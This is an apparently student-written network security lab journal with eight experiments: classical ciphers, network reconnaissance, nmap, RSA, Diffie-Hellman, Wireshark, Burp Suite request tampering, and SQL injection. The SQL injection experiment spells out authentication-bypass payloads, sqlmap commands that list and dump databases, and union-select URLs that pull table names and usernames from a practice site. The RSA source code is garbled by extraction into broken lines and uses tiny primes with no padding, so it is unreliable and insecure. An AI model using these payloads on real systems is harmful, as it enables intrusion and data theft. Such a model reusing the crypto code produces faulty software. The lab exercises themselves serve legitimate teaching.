1 5111732456357102233

Nss Paper – I (University of Mumbai)

Scan to open on Studocu

Studocu is not sponsored or endorsed by any college or university

Downloaded by Irin Solomon
 Experiment no.1: Design and implement of a product cipher using Substitution and Transposition
Cipher

Learning Objective: Student should be able to design and implementation of a product cipher using
Substitution and Transposition Cipher.

Tools: C/C++/Java/Python or any computational software

Theory:

A substitution cipher is a method of encoding by which units of plaintext are replaced with ciphertext,
according to a fixed system; the "units" may be single letters (the most common), pairs of letters,
triplets of letters, mixtures of the above, and so forth. The receiver deciphers the text by performing
the inverse substitution.
There are a number of different types of substitution cipher. If the cipher operates on single letters, it
is termed a simple substitution cipher; a cipher that operates on larger groups of letters is
termed polyalphabetic. A monoalphabetic cipher uses fixed substitution over the entire message,
whereas a polyalphabetic cipher uses a number of substitutions at different positions in the message,
where a unit from the plaintext is mapped to one of several possibilities in the ciphertext and vice
versa.
The function for Additive/Shift/Generalized Caesar Cipher is given as follows:

฀ It can use any shift from 1 to 25, i.e., replace each letter by a letter a fixed distance away.
฀ Ci=E(Pi)=(Pi+k) mod 26 and Pi=D(Ci)=(Ci-k) mod 26.

In Cryptography, a Caesar Cipher, also known as Caesar's Cipher, the Shift Cipher, Caesar's
Code or Caesar Shift, is one of the simplest and most widely known encryption techniques. It is a type
of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of
positions down the alphabet. For example, with a left shift of 3, A would be replaced by D, E would
become H, and so on. The method is named after Julius Caesar, who used it in his private
correspondence.

The function for Caesar Cipher is defined as follows:

⚫ Ci= E(Pi)=(Pi+3) mod 26.

⚫ Pi=D(Ci)=(Ci-3) mod 26.
⚫ Example:
⚫ Plain Text: ABCDEFGHIJKLMNOPQRSTUVWXYZ
⚫ Cipher Text: DEFGHIJKLMNOPQRSTUVWXYZABC

Substitution ciphers can be compared with transposition ciphers. In a transposition cipher, the units of
the plaintext are rearranged in a different and usually quite complex order, but the units themselves
are left unchanged. By contrast, in a substitution cipher, the units of the plaintext are retained in the
same sequence in the ciphertext, but the units themselves are altered.

Downloaded by Irin Solomon

A transposition cipher is a method of encryption by which the positions held by units
of plaintext (which are commonly characters or groups of characters) are shifted according to a
regular system, so that the ciphertext constitutes a permutation of the plaintext. That is, the order of
the units is changed (the plaintext is reordered). Mathematically a bijective function is used on the
characters' positions to encrypt and an inverse function to decrypt.

Transposition Ciphers does not substitute one symbol for another, instead it changes the location of
the symbols.

A symbol in the first position of the plaintext may appear in the tenth position of the ciphertext. A
symbol in the eight position in the plaintext may appear in the first position of the ciphertext. A
transposition cipher reorders (transposes) the symbols. Simple transposition ciphers, which were
used in the past, are keyless.

There are two methods for permutation of characters. In the first method, the text is written into a
table column by column and then transmitted row by row. In the second method, the text is written
into a table row by row and then transmitted column by column.

Method I-

Method II-

Downloaded by Irin Solomon

Cipher Text:

Source Code:

Substitution Cipher (Affine Cipher):

Downloaded by Irin Solomon

Transposition Cipher:

Output:

1. Affine Cipher

2. Transposition cipher

Downloaded by Irin Solomon

Applications:

1. Ciphers enables private communication in many different networking protocols

2. The most common application of cipher techniques are encrypt and decrypt
Emails and other Plain-texts.

Result and Discussion:

In this Experiment, we implemented a Substitution Cipher and Transposition Cipher
algorithms in python. We implemented a Affine Substitution Cipher and got the Expected
Encrypted text. Also, for Transposition cipher, we implemented Keyless Transposition
Cipher Method 1 algorithm to Encrypt the text and got the desired output.

Learning Outcomes: The student should have the ability to design & implement product
cipher using Substitution and Transposition Cipher

LO1: To describe & understand about Substitution and Transposition cipher techniques

Downloaded by Irin Solomon

LO2: To implement Substitution and Transposition cipher techniques

Course Outcomes: Upon completion of the course students will be able to understand & implement
Substitution and Transposition Cipher.

Conclusion :

After performing this Experiment, we understood how to implement substitution and

transposition ciphers. We learned various Substitutions and Transposition Cipher
techniques. In this Experiment, we implemented Affine Cipher i.e (P*k1+K2)mod26 and
keyless transposition method1 .

For Faculty Use

Correction Formative Timely Attendance /

Parameters Assessment completion of Learning
[40%] Practical Attitude [20%]
[ 40%]
Marks
Obtained

Downloaded by Irin Solomon

 Experiment no.2: Study the use of network reconnaissance tools/commands like ping,
traceroute, whois, etc. to gather information about networks and domain registrars

Learning Objective: Student should be able to understand about network information

discovery & various basic network commands to gather network information.
Tools: Networking Commands

Theory:

Reconnaissance is a set of processes and techniques used to covertly discover and

collect information about a target system. During reconnaissance, an ethical hacker attempts
to gather as much information about a target system as possible.
Active reconnaissance is a type of computer attack in which an intruder engages with the
targeted system to gather information about vulnerabilities. This may be through automated
scanning or manual testing using various tools like ping, traceroute, netcat etc (Intrusion
Detection Systems, network firewalls, etc.)
When one is conducting Passive reconnaissance, one is not interacting directly with the
target and as such, the target has no way of knowing, recording, or logging
activity. The reconnaissance is aimed at collecting as much information as possible on a
target.
Some of the networking commands used to gather information:
1. Ping:
Ping is a basic Internet program that allows a user to verify that a particular IP address exists
and can accept requests. Ping is used diagnostically to ensure that a host computer the user is
trying to reach is actually operating. Ping works by sending an Internet Control Message
Protocol (ICMP) Echo Request to a specified interface on the network and waiting for a
reply. Ping can be used for troubleshooting to test connectivity and determine response time.

2. Traceroute:
Traceroute prints the route that packets take to a network host. Traceroute utility uses the
TTL field in the IP header to achieve its operation. The TTL field, describes how much hops
a particular packet will take while traveling on network. So, this effectively outlines the
lifetime of the packet on network. This field is usually set to 32 or 64. Each time the packet is
held on

Downloaded by Irin Solomon

an intermediate router, it decreases the TTL value by 1. When a router finds the TTL value of
1 in a received packet then that packet is not forwarded but instead discarded. After
discarding the packet, router sends an ICMP error message of ―Time exceeded, back to the
source from where packet generated. The ICMP packet that is sent back contains the IP
address of the router. So now it can be easily understood that traceroute operates by sending
packets with TTL value starting from 1 and then incrementing by one each time. Each time a
router receives the packet, it checks the TTL field, if TTL field is 1 then it discards the packet
and sends the ICMP error packet containing its IP address. So, traceroute incrementally
fetches the IP of all the routers between the source and the destination.

3. Nslookup: The nslookup command is used to query internet name servers interactively for
information. nslookup, which stands for "name server lookup", is a useful tool for finding out
information about a domain name. By default, nslookup will translate a domain name to an IP
address (or vice versa).

4. WHOIS: WHOIS is the Linux utility for searching an object in a WHOIS database. The
WHOIS database of a domain is the publicly displayed information about a domains
ownership, billing, technical, administrative, and nameserver information. Running a WHOIS
on your domain will look the domain up at the registrar for the domain information. All
domains have WHOIS information. WHOIS database can be queried to obtain the following
information via WHOIS:
• Administrative contact details, including names, email addresses, and telephone numbers
• Mailing addresses for office locations related to the target organization
• Details of authoritative name servers for each given domain

Output:

Downloaded by Irin Solomon

Downloaded by Irin Solomon
Downloaded by Irin Solomon
Result and Discussion:
1. Ping - This command allows you to test the reachability of a device on a network.
Pinging a host should return four data packets if no network anomaly is present.
2. hostname - This command returns the name of the host.
3. getmac - A user can determine the MAC address of their various network devices
using this command.
4. arp – Displays entries in the Address Resolution Protocol (ARP) cache, which
contains one or more tables that are used to store IP addresses and their resolved
physical addresses.
5. nslookup - The NSLookUp Windows 10 network command displays information that
you can use to diagnose Domain Name System (DNS) infrastructure. Using
NSLookUp without a parameter will show the DNS server your PC is currently using
to resolve domain names into IP addresses.
6. tracert - This command will trace the route a data packet takes before reaching its
destination, displaying information on each hop along the route. Each hop of the route
will display the latency between your device and that particular hop and the IP
address of the hop.
7. ipconfig - The IPConfig command displays basic IP address configuration
information for the current host.
8. netstat - The Netstat command displays active TCP connections, ports on which the
computer is listening.

Downloaded by Irin Solomon

 Learning Outcomes: The student will be able to

LO1: Understand the use of network reconnaissance tools

LO2: Apply basic network command to gather basic network information.

Course Outcomes: Upon completion of the course students will be able to study the various
network reconnaissance tools & how to use them to gather primary network information.

Conclusion:
In this experiment we used various network commands to gather information about the network
host is present in and learned to read and understand their outputs.

For Faculty Use

Correction Formative Timely Attendance /

Parameter Assessment completion of Learning
s [40%] Practical Attitude [20%]

40%]

Marks
Obtained

Downloaded by Irin Solomon

Experiment no.3: Analyze the tool nmap and use it with different options to scan open ports,
perform OS fingerprinting, do a ping scan, tcp port scan, udp port scan,
xmas scan etc

Learning Objective: Student should be able to:

 Download, install & use nmap tool

 Understand port scanning
 Understand the how nmap helps to scan various ports
 Explore various nmap options for OS fingerprinting and gathering detailed network and
remote hosts information
Tools: nmap tool

Theory:

Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by
his pseudonym Fyodor Vaskovich) used to discover hosts and services on a computer network,
thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted
packets to the target host and then analyses the responses. Unlike many simple port scanners that
just send packets at some predefined constant rate, Nmap accounts for the network conditions
(latency fluctuations, network congestion, the target interference with the scan) during the run.
Also, owing to the large and active user community providing feedback and contributing to its
features, Nmap has been able to extend its discovery capabilities beyond simply figuring out
whether a host is up or down and which ports are open and closed; it can determine the operating
system of the target, names and versions of the listening services, estimated uptime, type of
device, and presence of a firewall.

Nmap features include:

Host Discovery – Identifying hosts on a network. For example, listing the hosts which respond
to pings or have a particular port open.

Port Scanning – Enumerating the open ports on one or more target hosts.

Version Detection – Interrogating listening network services listening on remote devices to

determine the application name and version number.

OS Detection – Remotely determining the operating system and some hardware characteristics of
network devices.

Downloaded by Irin Solomon

Downloaded by Irin Solomon
Downloaded by Irin Solomon
Learning Outcomes: The student should have the ability to install and use nmap

LO1: To understand and explore about nmap tool

LO2: To use nmap tool for gathering detailed network information

Course Outcomes: Upon completion of the course students will be able to install and use
nmap and use it for gathering detailed network and remote host information

Conclusion:

In this experiment we learned about the NMAP network tool and its various usecases. We
executed a number of NMAP commands such as network scan for active hosts, OS
fingerprinting, services and applications detection along with it’s version on a target host as
well as a Port scan to find open ports for TCP or UDP connection in order to exploit any
potential vulnerabilities.

*Mention key points wrt nmap tool

For Faculty Use

Correction Formative Timely Attendance /

Parameter Assessment completion of Learning
s [40%] Practical Attitude [20%]

[ 40%]

Marks
Obtained

Downloaded by Irin Solomon

 Experiment no.4: Write a program to implement RSA

algorithm Learning Objective: Student should be able to implement RSA

Algorithm Tools: C/C++/Java/Python or any computational software

Theory:

In cryptography, RSA (which stands for Rivest, Shamir and Adleman who first publicly
described it) is an algorithm for public-key cryptography. It is the first algorithm known to
be suitable for signing as well as encryption, and was one of the first great advances in
public key cryptography. RSA is widely used in electronic commerce protocols, and is
believed to be sufficiently secure given sufficiently long keys and the use of up-to-date
implementations.

KEY GENERATION:

The RSA algorithm involves three steps: key generation, encryption and decryption.

RSA involves a public key and a private key. The public key can be known to everyone and
is used for encrypting messages. Messages encrypted with the public key can only be
decrypted using the private key. The keys for the RSA algorithm are generated the following
way:

1. Choose two distinct prime numbers p and q.

 For security purposes, the integers p and q should be chosen at random, and
should be of similar bit-length. Prime integers can be efficiently found using
a primality test.

2. Compute n = pq.
 n is used as the modulus for both the public and private keys.
3. Compute φ(n) = (p–1)(q–1), where φ is Euler's totient function.
4. Choose an integer e such that 1 < e < φ(n) and gcd(e,φ(n)) = 1, i.e. e and φ(n)
are coprime.
 e is released as the public key exponent.
5. Determine d = e–1 mod φ(n); i.e. d is the multiplicative inverse of e mod φ(n).
 This is more clearly stated as solve for d given (d*e)mod φ(n) = 1
 This is often computed using the extended Euclidean algorithm.

Downloaded by Irin Solomon

  d is kept as the private key exponent.

6. The public key consists of the modulus n and the public (or encryption) exponent e.
The private key consists of the private (or decryption) exponent d which must be kept
secret.

 Public Key {e,n}.

 Private Key {d,n}.

ENCRYPTION:

Alice transmits her public key (n,e) to Bob and keeps the private key secret. Bob then wishes to
send message M to Alice.

He first turns M into an integer m, such that 0 < m < n by using an agreed-upon reversible
protocol known as a padding scheme. He then computes the ciphertext c corresponding to

c = me (mod n).

This can be done quickly using the method of exponentiation by squaring. Bob then transmits c
to Alice.

DECRYPTION:

Alice can recover m from c by using her private key exponent d via computing

m = cd (mod n).

Source Code:

import math
import random
def modInverse(a,
m): m0 = m
y = 0
x = 1
if (m == 1):
return 0
while (a > 1):
q = a //
mt =m
m=a%m

Downloaded by Irin Solomon

 a=
t t
= y
y= x - q *
yx= t
if (x < 0):
x = x + m0
return x

def check_prime(n):
for i in
range(2,n//2):
if n%i==0:
return
False return
True
prime_list=[i for i in range(2,150) if
check_prime(i)]
p=prime_list[random.randint(0,len(prime_list
)-1)]
q=2
flag=0
m=input("Enter the message to be
encrypted : ") try:
m=int(m)
except:
m=m.uppe
r() if
type(m)!
=int:
flag=1
Ascii_conversion=
"" for char in m:
Ascii_conversion+=str(ord(char))
m=int(Ascii_conversion)
q
=
0
i=
2
while q==0:
if
check_prime(i)==
True: if
(p*i)>int(m):
q=i
bre
ak
i+=1
n=p*q

Downloaded by Irin Solomon

n2=(p-1)*(q-1)
e=2
while
math.gcd(e,n2)!
=1: e+=1
d=modInverse(e,n2)
print("Public Key Pair : ({},{})".format(e,n))
print("Private Key Pair : ({},
{})".format(d,n)) def res(e,n):

encrypted_msg=(m**e)%n

Downloaded by Irin Solomon

 print("Encrypted message :",encrypted_msg)
decrpyted_msg=(encrypted_msg**d)%n
if flag==1:
Decrypted_Ascii=str(decrpyted_msg)
Decrypted_Text=""
for i in range(0,len(Decrypted_Ascii),2):
Decrypted_Text+=chr(int(Decrypted_Ascii[i]
+Decrypted_Ascii[i+1]))

print("Decrpyted message :",Decrypted_Text)

res(e,n)

Output:

Applications:

1. RSA algorithm is commonly used by banks to protect their data, like customer
information and transaction record. Some scenarios are credit card and office computers.

2. RSA algorithm is useful to encrypt the call data as a concern for privacy issues because
it is Asymmetrical Encryption Algorithm.

Result and Discussion:

In this Experiment, we implemented RSA algorithm in python. We learned the algorithm and
its working. We learned how p and q, the two large prime numbers selection plays a major
role in encryption of data. We got the desired output after implementing this algorithm.

Learning Outcomes: The student should have the ability to understand RSA

Algorithm LO1: To describe & understand about RSA Algorithm

Downloaded by Irin Solomon

LO2: To implement RSA Algorithm

Course Outcomes: Upon completion of the course students will be able to understand &
implement RSA Algorithm

Conclusion : We learned the RSA algorithm in detail and understood how RSA overcome
the weaknesses of symmetrical algorithm in Authenticity and Confidentiality of data. Since
RSA is Asymmetrical algorithm, it uses two keys. i.e. public key and private key. RSA is
stronger than any other symmetrical algorithms but it requires more computation.

For Faculty Use

Correction Formative Timely Attendance /

Parameters Assessment completion of Learning
[40%] Practical Attitude [20%]

[ 40%]

Marks
Obtained

Downloaded by Irin Solomon

 Experiment no.5

Learning Objective: Analyze and implement Diffie-Hellman Key Exchange Algorithm

Tools: C/C++/Java/Python
Theory: DIFFIE–HELLMAN KEY EXCHANGE:

Diffie–Hellman key exchange (D–H) is a specific method of exchanging keys. It is one of

the earliest practical examples of key exchange implemented within the field of
cryptography. The Diffie–Hellman key exchange method allows two parties that have no
prior knowledge of each other to jointly establish a shared secret key over an insecure
communications channel. This key can then be used to encrypt subsequent communications
using a symmetric key cipher.

The Diffie–Hellman key agreement was invented in 1976 during a collaboration between
Whitfield Diffie and Martin Hellman and was the first practical method for establishing
a shared secret over an unprotected communication channel.

Diffie–Hellman establishes a shared secret that can be used for secret communications by
exchanging data over a public network.

Downloaded by Irin Solomon

STEP 1: GLOBAL PUBLIC ELEMENTS:
Firstly, Alice and Bob agree on two large prime numbers, n and g. These two integers need
not be kept secret. Alice and Bob can use an insecure channel to agree on them.

STEP 2: ASYMMETRIC KEY GENERATION BY USER 'A':

Alice chooses another large random number X, and calculates, the public key, A, such that:

A= gX mod n

STEP 3: Alice sends the number A to Bob.

STEP 4: KEY GENERATION BY USER 'B':

Bob independently chooses another large random number Y, and calculates, the public key,
B, such that:

B= gY mod n

STEP 5: Bob sends the number B to Alice.

STEP 6: SYMMETRIC KEY (K) GENERATION BY USER 'A':

A now computes the secret key, K1 as follows:

K1= BX mod n

STEP 7: SYMMETRIC KEY (K) GENERATION BY USER 'B':

B now computes the secret key, K2 as follows:

K2= AY mod n

NOTE:

It should be difficult for Alice to solve for Bob's private key or for Bob to solve for Alice's
private key. If it is not difficult for Alice to solve for Bob's private key (or vice versa), Eve
may simply substitute her own private / public key pair, plug Bob's public key into her
private key, produce a fake shared secret key, and solve for Bob's private key (and use that to
solve for the shared secret key. Eve may attempt to choose a public / private key pair that
will make it easy for her to solve for Bob's private key).

Downloaded by Irin Solomon

CODE:

n=int(input("Enter 1st prime number : "))

g=int(input("enter 2nd prime number : "))
x=int(input("Enter 1st Secret Key : "))
y=int(input("Enter 2nd Secret Key : "))
A=(g**x)%n
B=(g**y)%n
k1=(B**x)%n
k2=(A**y)%n
print("key generated ")
print("k1 : ",k1)
print("k2 : ",k2)
print("k1 : {} === k2 : {}".format(k1,k2))

OUTPUT :

Result and Discussion:

In this Experiment, we implemented Diffie-Hellman Algorithm for key Exchanging

between to users. We got the desired output from the algorithm after exchanging keys i.e.
K1==K2.

Learning Outcomes: The student will be able to

LO1: Understand the Diffie-Hellman Key Exchange Algorithm

LO2: Analyze and implement the Diffie-Hellman Key Exchange Algorithm

Course Outcomes: Upon completion of the course students will be able to analyze and
implement Diffie-Hellman Key Exchange Algorithm for generation of shared symmetric key

Conclusion: After performing this Experiment, we understood about the Diffie-Hellman Key
Exchange Algorithm in detail. We learned how attacker can alter the messages and may alter
the communication between two users if there private keys are easy to solve.

Downloaded by Irin Solomon

For Faculty Use

Correction Formative Timely Attendance /

Parameters Assessment completion of Learning
[40%] Practical Attitude [20%]

[ 40%]

Marks
Obtained

Downloaded by Irin Solomon

 Experiment no.6

Aim: Study of packet sniffer tools: Wireshark

Download and install wireshark and capture icmp, tcp, and http packets in promiscuous mode
and explore how the packets can be traced based on different filters.

Objectives: • Understand the need for traffic analysis. • Understand the how packet sniffing
is done using wireshark. • Trace and understand various packets from dynamic traffic.

Outcomes: The learner will be able to • Sniff network packets and study insights of packets
to get detail network information.

Hardware / Software Required: Unix/Linux/Windows, wireshark

Theory:

Wireshark, a network analysis tool formerly known as Ethereal, captures packets in real time
and display them in human-readable format. Wireshark includes filters, color-coding and
other features that let you dig deep into network traffic and inspect individual packets.

Features of Wireshark:

• Available for UNIX and Windows.

• Capture live packet data from a network interface.

• Open files containing packet data captured with tcpdump/WinDump, Wireshark, and a

• number of other packet capture programs.

• Import packets from text files containing hex dumps of packet data.

• Display packets with very detailed protocol information.

• Export some or all packets in a number of capture file formats.

• Filter packets on many criteria.

• Search for packets on many criteria.

• Colorize packet display based on filters.

Downloaded by Irin Solomon

Create various statistics.

Capturing Packets:

After downloading and installing wireshark, you can launch it and click the name of an interface
under Interface List to start capturing packets on that interface. For example, if you want to
capture traffic on the wireless network, click your wireless interface. You can configure
advanced features by clicking Capture Options.

Installation of Wireshark: sudo apt-get install wireshark

After downloading and installing wireshark, you can launch it and click the name of an interface
under Interface List to start capturing packets on that interface. For example, if you want to
capture traffic on the wireless network, click your wireless interface. You can configure
advanced features by clicking Capture Options.

As soon as you click the interface‘s name, you‘ll see the packets start to appear in real time.
Wireshark captures each packet sent to or from your system. If you‘re capturing on a wireless
interface and have promiscuous mode enabled in your capture options, you‘ll also see other
the other packets on the network.

Click the stop capture button near the top left corner of the window when you want to stop
capturing traffic.

Wireshark uses colors to help you identify the types of traffic at a glance. By default, green is
TCP traffic, dark blue is DNS traffic, light blue is UDP traffic, and black identifies TCP
packets with problems — for example, they could have been delivered out-of-order.

Filtering Packets:

The most basic way to apply a filter is by typing it into the filter box at the top of the window and
clicking Apply (or pressing Enter). For example, type ―dns‖ and you‘ll see only DNS
packets. When you start typing, Wireshark will help you autocomplete your filter.

Downloaded by Irin Solomon

Output:

1. Wireshark Interface (All Packets without Filtering) :

2. Ip.addr==192.168.0.1 :

Downloaded by Irin Solomon

3. ip.src==192.168.0.1 :

4. ip.dst==192.168.0.1 :

Downloaded by Irin Solomon

 5. dns :

Learning Outcomes: The student will be able to

LO1: Understand the need for traffic analysis

LO2: Understand the how packet sniffing is done using wireshark

Course Outcomes: Upon completion of the course students will be able to download and install
wireshark and capture icmp, tcp, and http packets in promiscuous mode and explore how the
packets can be traced based on different filters

Conclusion: Wireshark installation and network traffic analysis using packet sniffing is done.
Detailed information about packets are explored by applying filters.

Downloaded by Irin Solomon

For Faculty Use

Correction Formative Timely Attendance /

Parameters Assessment completion of Learning
[40%] Practical Attitude [20%]

[ 40%]

Marks
Obtained

Downloaded by Irin Solomon

 Experiment no. 7

Aim: To perform Web Security Testing

Objectives: To understand about Web Security Testing

Outcomes: The learner will be able to understand Web Security Testing and simulate using
Tools

Hardware / Software Required: Burpsuite

Theory:

Web application security testing is the process of testing, analyzing and reporting on the
security level and/or posture of a Web application. It is used by Web developers and security
administrators to test and gauge the security strength of a Web application using manual and
automated security testing techniques.

Web application security testing is a broad process that includes a multitude of processes that
enable security testing of a Web application. It is a systematic process that starts from
identifying and scoping the entire application, followed by planning multiple tests.

Typically, Web application security testing is performed after the Web application is
developed. The Web application undergoes a rigorous testing process that includes a series of
fabricated malicious attacks to see how well the Web application performs/responds. The
overall security testing process is generally followed by a format report that includes the
identified vulnerabilities, possible threats and recommendations for overcoming the security
shortfalls.

Some of the processes within the testing process include:

 Brute force attack testing

 Password quality rules
 Session cookies
 User authorization processes
 SQL injection

Mention about the Tool used

Downloaded by Irin Solomon

Output:

Interception :

Downloaded by Irin Solomon

Interception Turned On :

Interception Turned Off :

Downloaded by Irin Solomon

Modifying Requests in Burp Proxy :

Open vulnerable website :

View product page inspection :

Downloaded by Irin Solomon

Turn Intercept On and Click Add to Cart to inspect Post Cart Details :

Modify Request (Change Price Money from 1337700 to 1 Dollar ) :

Downloaded by Irin Solomon

Turn Interception Off and View Shopping Cart to view updated details :

Details of Target :

Downloaded by Irin Solomon

Learning Outcomes: The student will be able to

LO1: Understand and simulate Web Security Testing

LO2: Understand the use of Web Security Testing

Course Outcomes: Upon completion of the course students will be able to understand and
simulate Web Security Testing

Conclusion: After performing this Experiment, we understood about how simulate Web
Security testing and the use of Web Security testing . We intercepted the vulnerable website
and also modified the request by intercepting it and changing its content before passing it on
to server.

For Faculty Use

Correction Formative Timely Attendance /

Parameters Assessment completion of Learning
[40%] Practical Attitude [20%]

[ 40%]

Marks
Obtained

Downloaded by Irin Solomon

 Experiment no. 8

Aim: Simulation of SQL Injection Attack

Objectives: To understand about SQL Injection Attack

Outcomes: The learner will be able to understand and simulate SQL Injection Attack

Hardware / Software Required: Unix/Linux, SQLmap

Theory:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious
SQL statements (also commonly referred to as a malicious payload) that control a web
application’s database server (also commonly referred to as a Relational Database
Management System – RDBMS). Since an SQL injection vulnerability could possibly affect
any website or web application that makes use of an SQL-based database, the vulnerability is
one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

By leveraging an SQL injection vulnerability, given the right circumstances, an attacker can
use it to bypass a web application’s authentication and authorization mechanisms and
retrieve the contents of an entire database. SQL injection can also be used to add, modify and
delete records in a database, affecting data integrity.

To such an extent, SQL injection can provide an attacker with unauthorized access to
sensitive data including, customer data, personally identifiable information (PII), trade
secrets, intellectual property and other sensitive information.

How SQL Injection works

In order to run malicious SQL queries against a database server, an attacker must first find
an input within the web application that is included inside of an SQL query.

In order for an SQL injection attack to take place, the vulnerable website needs to directly
include user input within an SQL statement. An attacker can then insert a payload that will
be included as part of the SQL query and run against the database server.

Downloaded by Irin Solomon

The following server-side pseudo-code is used to authenticate users to the web application. #
Define POST variables uname = request.POST['username'] passwd =
request.POST['password']

# SQL query vulnerable to SQLi sql = “SELECT id FROM users WHERE username=’” +
uname + “’ AND password=’” + passwd + “’”

# Execute the SQL statement database.execute(sql)

The above script is a simple example of authenticating a user with a username and a password
against a database with a table named users, and a username and password column.

The above script is vulnerable to SQL injection because an attacker could submit malicious
input in such a way that would alter the SQL statement being executed by the database server.

A simple example of an SQL injection payload could be something as simple as setting the
password field to password’ OR 1=1.

This would result in the following SQL query being run against the database server.

SELECT id FROM users WHERE username=’username’ AND password=’password’ OR

1=1’

An attacker can also comment out the rest of the SQL statement to control the execution of the
SQL query further.

Downloaded by Irin Solomon

-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite ' OR '1'='1' -- ' OR '1'='1' /* -- MySQL ' OR
'1'='1' # -- Access (using null characters) ' OR '1'='1' %00 ' OR '1'='1' %16

Once the query executes, the result is returned to the application to be processed, resulting
in an authentication bypass. In the event of authentication bypass being possible, the
application will most likely log the attacker in with the first account from the query result —
the first account in a database is usually of an administrative user.

To check whether website is vulnerable, replace the value in the get request parameter with
an asterisk (*)

http://testphp.vulnweb.com/listproducts.php?cat=*

If this results in an error such as the error given below, then we can say that the website is
vulnerable.

Downloaded by Irin Solomon

SQLMAP: sqlmap is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database servers. It comes
with a powerful detection engine, many niche features for the ultimate penetration tester
and a broad range of switches lasting from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.

Step 1: Installation of sqlmap

$ sudo apt-get install sqlmap

Step 2 : List information about the existing databases

To check access to a database, - - dbs option can be used. - - dbs lists all the available
databases.

It notifies vulnerability in parameter cat, various payloads executed, name of backend

database, its version and list of all available databases. Here, two databases: acuart and
information_schema are listed.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Downloaded by Irin Solomon

Step 3: Listing tables present in Database

Each of the database can further explored to get tables information from them. Option -D
can be used to specify the name of the database we need to explore. If access to the database
is allowed, we can access the tables using --tables option along with name of database. Here,
acuart database is accessed and all available tables in that database are listed as an output of
the following command.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Step 4: List column information of a particular table

Columns of a particular table can be viewed by specifying -T option before table name and -
-columns option to query the column names. Access to table and its column for table
"products" is displayed by following command.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products –

columns

Step 5: Dump the data from the columns

Information from specific column can be retrieved and displayed using -C. Multiple
column can also be listed separated by a comma and the –dump query retrieves the data.
Flowing command shows all Domain values of column name from product table from
acuart database.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products -C

name -dump

Downloaded by Irin Solomon

Output:

Implementation :

Open given below targeted URL in the browser:

http://testphp.vulnweb.com/artists.php?artist=1

using ORDER BY keyword to sort the records in ascending or descending order for

id=1 http://testphp.vulnweb.com/artists.php?artist=1 order by 1

Downloaded by Irin Solomon

penetrate more inside using union base injection to select statement from a different table.
http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3

fetch the name of the database http://testphp.vulnweb.com/artists.php?

artist=-1 union select 1,database(),3

Downloaded by Irin Solomon

extract the current username as well as a version of the database system

http://testphp.vulnweb.com/artists.php?artist=-1 union select

1,version(),current_user()

fetch table name inside the database http://testphp.vulnweb.com/artists.php?

artist=-1 union select 1,table_name,3 from information_schema.tables where

table_schema=database() limit 0,1

Downloaded by Irin Solomon

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from

information_schema.tables where table_schema=database() limit 3,1

concat function is used for concatenation of two or more string into a single string.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, group_concat (table _

name) , 3 from information_schema.tables where table_schema=database()

Downloaded by Irin Solomon

Use the concat function for selecting uname from table users by executing the following
query through URL

http://testphp.vulnweb.com/artists.php?artist=-1 union select

1,group_concat(uname),3 from users

Learning Outcomes: The student will be able to

LO1: Understand and simulate SQL Injection Attack

LO2: Understand the effects of SQL Injection Attack

Course Outcomes: Upon completion of the course students will be able to understand and
simulate SQL Injection Attack

Conclusion : After performing this Experiment, we understood how to simulate SQL

Injection Attack and different effects of SQL Injection Attack.

Downloaded by Irin Solomon

For Faculty Use

Correction Formative Timely Attendance /

Parameters Assessment completion of Learning
[40%] Practical Attitude [20%]

[ 40%]

Marks
Obtained

Downloaded by Irin Solomon